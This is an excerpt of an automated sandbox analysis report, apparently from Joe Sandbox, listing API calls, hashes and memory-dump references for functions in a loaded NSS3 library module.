PK11_HasAttributeSet.NSS3(?,?,00000002,00000000,?,?,?,?,00000007,?,00000000), ref: 6C766B97

Part of subcall function 6C781870: TlsGetValue.KERNEL32 ref: 6C7818A6
Part of subcall function 6C781870: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6C766C34,?,?,00000001,00000000,00000007,?), ref: 6C7818B6
Part of subcall function 6C781870: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C766C34,?,?), ref: 6C7818E1
Part of subcall function 6C781870: PR_SetError.NSS3(00000000,00000000), ref: 6C7818F9

PK11_HasAttributeSet.NSS3(?,?,00000001,00000000,00000007,?,00000000), ref: 6C766C2F
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000007,?,00000000), ref: 6C766C61

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_$Util$Arena_Attribute$Alloc_ArenaAuthenticateCriticalEnterErrorFreeLoggedSectionUnlockValue
String ID:
API String ID: 2313852964-0
Opcode ID: c0a905ea341e6305a619c765cf506a6194c4860f147e12fd12f672117ee6510c
Instruction ID: bebae061781f4a2a736a2b9f69196fc2d78498cf02b2cba4646f97344af7432a
Opcode Fuzzy Hash: c0a905ea341e6305a619c765cf506a6194c4860f147e12fd12f672117ee6510c
Instruction Fuzzy Hash: E131E4B5A003019BE7008F66DE85FAE7764EB45758F54003DEE08ABB82E771DA51C6E1

Function 6C740E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

CERT_DecodeAVAValue.NSS3(?,?,6C740A2C), ref: 6C740E0F
PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6C740A2C), ref: 6C740E73
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6C740A2C), ref: 6C740E85
PORT_ZAlloc_Util.NSS3(00000001,?,?,6C740A2C), ref: 6C740E90
free.MOZGLUE(00000000), ref: 6C740EC4
SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6C740A2C), ref: 6C740ED9

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
String ID:
API String ID: 3618544408-0
Opcode ID: 6de1a62dea2542998d41445c8b9863277bfead5add72c985656fa14872594863
Instruction ID: 4082f07aa047d3085cf12470575c7de25c4d107c5d4831a89b7dc9918cfb5ad0
Opcode Fuzzy Hash: 6de1a62dea2542998d41445c8b9863277bfead5add72c985656fa14872594863
Instruction Fuzzy Hash: 33216E73E402A587EB1069769E49F6B72AEDFE174CF09C435D81853A02EB61C83582A1

Function 6C72A9B0 Relevance: 9.1, APIs: 6, Instructions: 101synchronizationCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,?,6C809270), ref: 6C72A9BF
PR_IntervalToMilliseconds.NSS3(?,?,6C809270), ref: 6C72A9DE

Part of subcall function 6C72AB40: __aulldiv.LIBCMT ref: 6C72AB66

Part of subcall function 6C80CA40: LeaveCriticalSection.KERNEL32(?), ref: 6C80CAAB

LeaveCriticalSection.KERNEL32(?), ref: 6C72AA2C
WaitForSingleObject.KERNEL32(?,-00000001), ref: 6C72AA39
EnterCriticalSection.KERNEL32(?), ref: 6C72AA42
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C72AAEB

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CriticalSection$LeaveObjectSingleWait$EnterIntervalMillisecondsValue__aulldiv
String ID:
API String ID: 4008047719-0
Opcode ID: bc47a68ea92b534c36cea0aa6597e63aadf9d1d852b00c42d5f57fad55e0591c
Instruction ID: f501dae45ee069a665bc0234e7b3befdf9eab72e8f8bee16ec724edd45f8b608
Opcode Fuzzy Hash: bc47a68ea92b534c36cea0aa6597e63aadf9d1d852b00c42d5f57fad55e0591c
Instruction Fuzzy Hash: 9D415E706047018FD7109F29C684796BBF1FF46328F248A7DE45E8B642DB7A9981CBC0

Function 6C7588D0 Relevance: 9.1, APIs: 6, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C760725,00000000,00000058), ref: 6C758906
EnterCriticalSection.KERNEL32(?), ref: 6C75891A
PL_ArenaAllocate.NSS3(?,?), ref: 6C75894A
calloc.MOZGLUE(00000001,6C76072D,00000000,00000000,00000000,?,6C760725,00000000,00000058), ref: 6C758959
memset.VCRUNTIME140(?,00000000,?), ref: 6C758993
PR_Unlock.NSS3(?), ref: 6C7589AF

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$calloc$AllocateArenaCriticalEnterSectionUnlockmemset
String ID:
API String ID: 1716546843-0
Opcode ID: 740eb6771aceef4172f67c1f8024609bc23e253f4dfa90408e48c5c8a9c6105d
Instruction ID: 51a0f22d2eb784ec284db5c10dc726082d6deb87ff19093e2af2aca1b7a4929c
Opcode Fuzzy Hash: 740eb6771aceef4172f67c1f8024609bc23e253f4dfa90408e48c5c8a9c6105d
Instruction Fuzzy Hash: AF3137B2E90111ABD7008F28CD45A5ABBA8EF4531CF558636EC1CD7702EB32E865C7D2

Function 6C858A50 Relevance: 9.1, APIs: 6, Instructions: 84networkthreadCOMMON

Download Yara Rule

APIs

htons.WSOCK32(?), ref: 6C858A8F

Part of subcall function 6C730F00: PR_GetPageSize.NSS3(6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F1B
Part of subcall function 6C730F00: PR_NewLogModule.NSS3(clock,6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F25

htons.WSOCK32(?), ref: 6C858ACB
PR_GetCurrentThread.NSS3(?), ref: 6C858AE2
htons.WSOCK32(?), ref: 6C858B1E
htonl.WSOCK32(7F000001,?), ref: 6C858B3B

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: htons$CurrentModulePageSizeThreadhtonl
String ID:
API String ID: 3860140138-0
Opcode ID: 9a8c05d00d8eea2d5158dc994035d420833a7f7dddf53047aea7970ad501512c
Instruction ID: 31e6153fdf2a15b6e613147967e3110ead6bf68f45453e9554fd1a62877d78c5
Opcode Fuzzy Hash: 9a8c05d00d8eea2d5158dc994035d420833a7f7dddf53047aea7970ad501512c
Instruction Fuzzy Hash: EC210274DA474596C3B08F398A4056772FAAF85308B91DE2FE4D987A20F7B090D0C392

Function 6C77EE30 Relevance: 9.1, APIs: 6, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C77EE49

Part of subcall function 6C79FAB0: free.MOZGLUE(?,-00000001,?,?,6C73F673,00000000,00000000), ref: 6C79FAC7

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C77EE5C
PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6C77EE77
PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6C77EE9D
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C77EEB3

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
String ID:
API String ID: 886189093-0
Opcode ID: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction ID: 450e92b03b2ee44c90b89d3de130adaa2e795f310ef8f51f4801095597fbc0bc
Opcode Fuzzy Hash: c406ce7318dedb9b6bcb4b4cacb5e4229fd26394528e3ac5a67ff4d0476811dc
Instruction Fuzzy Hash: 9A21A1B6A002186FFF118A19ED89EABB6ACEB45718F040564FD089B751E6B1D81487F1

Function 6C7A0AA0 Relevance: 9.1, APIs: 6, Instructions: 79COMMON

Download Yara Rule

APIs

PL_HashTableDestroy.NSS3(?,?,?,6C757F62,00000000,00000000,?,?,?,6C7580DD), ref: 6C7A0AAE
PL_HashTableDestroy.NSS3(?,?,?,6C757F62,00000000,00000000,?,?,?,6C7580DD), ref: 6C7A0ACA
PL_HashTableDestroy.NSS3(?,?,?,6C757F62,00000000,00000000,?,?,?,6C7580DD), ref: 6C7A0B05
PORT_FreeArena_Util.NSS3(?,00000000,?,?,6C757F62,00000000,00000000,?,?,?,6C7580DD), ref: 6C7A0B24
free.MOZGLUE(?,?,?,6C757F62,00000000,00000000,?,?,?,6C7580DD), ref: 6C7A0B3C
memset.VCRUNTIME140(6C8A24E4,00000000,000005B0,?,?,6C757F62,00000000,00000000,?,?,?,6C7580DD), ref: 6C7A0BC2

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: DestroyHashTable$Arena_FreeUtilfreememset
String ID:
API String ID: 4033302747-0
Opcode ID: 1a99a1592702fd53d843587bcbed396c7f30be9ce0f228ded235ba74d639c5ac
Instruction ID: 9964bbe9d9e4c5dc0baebfb8c92a0e0542a8d46db0e1017bb4f7e3cd56477d63
Opcode Fuzzy Hash: 1a99a1592702fd53d843587bcbed396c7f30be9ce0f228ded235ba74d639c5ac
Instruction Fuzzy Hash: 3521E7F1B062419EEF70CBEBAA0D74B3AB8A70624CF004675D40ED2A41E73DA158CBD5

Function 6C798A60 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6C7461C4,?,6C745F9C,00000000), ref: 6C798A81
TlsGetValue.KERNEL32(?,?,?,6C745F9C,00000000), ref: 6C798A9E
EnterCriticalSection.KERNEL32(?,?,?,?,6C745F9C,00000000), ref: 6C798AB7
PR_Unlock.NSS3(?,?,?,?,?,6C745F9C,00000000), ref: 6C798AD2
PR_NotifyCondVar.NSS3(?,?,?,?,?,6C745F9C,00000000), ref: 6C798B05
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,6C745F9C,00000000), ref: 6C798B18

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CondNotifyValue$CriticalEnterSectionUnlock
String ID:
API String ID: 1007705821-0
Opcode ID: 52a3e0a9b5e214daf08f62240aaa0d2a92d06c0e5b0809df1526579b1d760672
Instruction ID: afdc8dac90e3a57ce010cdb13198ac27fa42a662013a1c5cc4128fe8f862765a
Opcode Fuzzy Hash: 52a3e0a9b5e214daf08f62240aaa0d2a92d06c0e5b0809df1526579b1d760672
Instruction Fuzzy Hash: 31212DB16047048FDB20AF79E248659F7F5FB0634CF054A3AD89987B51E734E898CB91

Function 6C794820 Relevance: 9.1, APIs: 6, Instructions: 74stringCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C794EB8,?), ref: 6C794884

Part of subcall function 6C798800: TlsGetValue.KERNEL32(?,6C7A085A,00000000,?,6C748369,?), ref: 6C798821
Part of subcall function 6C798800: TlsGetValue.KERNEL32(?,?,6C7A085A,00000000,?,6C748369,?), ref: 6C79883D
Part of subcall function 6C798800: EnterCriticalSection.KERNEL32(?,?,?,6C7A085A,00000000,?,6C748369,?), ref: 6C798856
Part of subcall function 6C798800: PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C798887
Part of subcall function 6C798800: PR_Unlock.NSS3(?,?,?,?,6C7A085A,00000000,?,6C748369,?), ref: 6C798899

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C794EB8,?,?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C79484C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C794EB8,?,?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C79486D
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7578F8), ref: 6C794899
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7948A9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7948B8

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockstrcmp$CondErrorWait
String ID:
API String ID: 2226052791-0
Opcode ID: 9da0970c02c28e4f97d05eb9ab895014bc379e759dcd5598da05dcfa7ca7de59
Instruction ID: 3e0190c741f16af9ed92ebe6fe9a0f82ce36ba1511c4f64d959888423fe26a3e
Opcode Fuzzy Hash: 9da0970c02c28e4f97d05eb9ab895014bc379e759dcd5598da05dcfa7ca7de59
Instruction Fuzzy Hash: AA21A776B002409BEF205EA6FE88D5677B8AF0635DB044574DE1947A02E721E814D7E1

Function 6C7589E0 Relevance: 9.1, APIs: 6, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C7588AE,-00000008), ref: 6C758A04
EnterCriticalSection.KERNEL32(?), ref: 6C758A15
memset.VCRUNTIME140(6C7588AE,00000000,00000132), ref: 6C758A27
PR_Unlock.NSS3(?), ref: 6C758A35
memset.VCRUNTIME140(6C7588AE,00000000,00000132,00000000,-00000008,00000000,?,?,6C7588AE,-00000008), ref: 6C758A45
free.MOZGLUE(6C7588A6,?,6C7588AE,-00000008), ref: 6C758A4E

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: memset$CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 65992600-0
Opcode ID: 44087d4f828a88b584eeaa5a85c2de0ea5b2a659704d48af79f91f402b5521e4
Instruction ID: 8b426b6e9e591c8c9f67de4935eab495e0f97cbde186612d1e92a6e5261eb662
Opcode Fuzzy Hash: 44087d4f828a88b584eeaa5a85c2de0ea5b2a659704d48af79f91f402b5521e4
Instruction Fuzzy Hash: 901108B5E403019BEB109F68DD49A5ABB78FF05318F400532E90897601EB32D564C7E1

Function 6C758A90 Relevance: 9.1, APIs: 6, Instructions: 58COMMON

Download Yara Rule

APIs

Part of subcall function 6C758FE0: PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C760710), ref: 6C758FF1
Part of subcall function 6C758FE0: calloc.MOZGLUE(00000001,00000000,?,?,6C760710), ref: 6C75904D
Part of subcall function 6C758FE0: memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C760710), ref: 6C759066
Part of subcall function 6C758FE0: PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C760710), ref: 6C759078

TlsGetValue.KERNEL32 ref: 6C758AC1
EnterCriticalSection.KERNEL32 ref: 6C758AD6
PL_FinishArenaPool.NSS3 ref: 6C758AE5
PR_Unlock.NSS3 ref: 6C758AF7
DeleteCriticalSection.KERNEL32 ref: 6C758B02
free.MOZGLUE ref: 6C758B0E

Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307AD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307CD
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6C204A), ref: 6C7307D6
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6C204A), ref: 6C7307E4
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,6C6C204A), ref: 6C730864
Part of subcall function 6C7307A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C730880
Part of subcall function 6C7307A0: TlsSetValue.KERNEL32(00000000,?,?,6C6C204A), ref: 6C7308CB
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308D7
Part of subcall function 6C7307A0: TlsGetValue.KERNEL32(?,?,6C6C204A), ref: 6C7308FB

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: Value$calloc$CriticalPrivateSectionThread$ArenaDeleteEnterFinishPoolUnlockfreememcpy
String ID:
API String ID: 417085867-0
Opcode ID: 1a5b4b9568617394be0845188adb53b4b90192f24016226d71e532dc018c3562
Instruction ID: e8a7912d42efd49a81eba3cf2f20a1e6a0e5f89b4f839f859ab914adc207a080
Opcode Fuzzy Hash: 1a5b4b9568617394be0845188adb53b4b90192f24016226d71e532dc018c3562
Instruction Fuzzy Hash: D71167B15146058BEB00BF78C28D66ABBF8FF01348F41493AD8858B701EB3594A9CBD2

Function 6C858910 Relevance: 9.1, APIs: 6, Instructions: 55threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C85892E

Part of subcall function 6C730F00: PR_GetPageSize.NSS3(6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F1B
Part of subcall function 6C730F00: PR_NewLogModule.NSS3(clock,6C730936,FFFFE8AE,?,6C6C16B7,00000000,?,6C730936,00000000,?,6C6C204A), ref: 6C730F25

PR_Lock.NSS3 ref: 6C858950

Part of subcall function 6C809BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C731A48), ref: 6C809BB3
Part of subcall function 6C809BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C731A48), ref: 6C809BC8

getprotobynumber.WSOCK32(?), ref: 6C858959
GetLastError.KERNEL32(?), ref: 6C858967
PR_GetCurrentThread.NSS3(?,?), ref: 6C85896F
PR_Unlock.NSS3(?,?), ref: 6C85898A

Memory Dump Source

Source File: 00000000.00000002.2445421860.000000006C6C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6C0000, based on PE: true

Associated: 00000000.00000002.2445395068.000000006C6C0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445566509.000000006C85F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445607098.000000006C89E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445632733.000000006C89F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445662195.000000006C8A0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2445687175.000000006C8A5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6c0000_file.jbxd

Similarity

API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
String ID:
API String ID: 4143355744-0
Opcode ID: 675a2559c4a4d9384df69109f191f7ae6b7053f71766d92883a8f2a84399d13b
Instruction ID: 28d0284b28c16149b7f59c48a3bf3201b642ffe7091153774e616d81619061cd
Opcode Fuzzy Hash: 675a2559c4a4d9384df69109f191f7ae6b7053f71766d92883a8f2a84399d13b
Instruction Fuzzy Hash: 441106B2A200209BCB705FB99E0458E7664AF45338F450777DC0997BA1D7709C14C7C6

Function 6C75AB10 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(D958E852,6C761397,5B5F5EC0,?,?,6C75B1EE,2404110F,?,?), ref: 6C75AB3C
free.MOZGLUE(D958E836,?,6C75B1EE,2404110F,?,?), ref: 6C75AB49
DeleteCriticalSection.KERNEL32(5D5E6C95), ref: 6C75AB5C
free.MOZGLUE(5D5E6C89), ref: 6C75AB63
DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C75AB6F
free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C75AB76

Part of subcall function 6C78F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C78F854
Part of subcall function 6C78F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C78F868
Part of subcall function 6C78F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C78F882
Part of subcall function 6C78F820: free.MOZGLUE(04C483FF,?,?), ref: 6C78F889
Part of subcall function 6C78F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C78F8A4
Part of subcall function 6C78F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C78F8AB
